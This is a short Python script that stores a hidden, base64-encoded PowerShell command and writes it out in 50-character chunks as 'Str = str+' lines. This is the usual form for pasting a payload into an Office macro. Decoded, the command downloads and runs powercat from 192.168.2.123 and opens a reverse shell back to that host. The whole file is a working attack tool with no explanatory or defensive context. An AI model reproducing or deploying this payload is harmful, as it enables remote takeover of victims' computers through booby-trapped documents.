str = "powershell.exe -nop -w hidden -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAxADIAMwA6ADgAMAAwADAALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAiACkAOwBwAG8AdwBlAHIAYwBhAHQAIAAtAGMAIAAxADkAMgAuADEANgA4AC4AMgAuADEAMgAzACAALQBwACAAMQAyADMANAA1ACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAKAA=="
n=50
for i in range(0,len(str),n):
   with open("payload.txt", "a") as f:
      f.write("Str = str+" + '"' + str[i:i+n] +'"\n')
      #Add a new line
   # py write to file
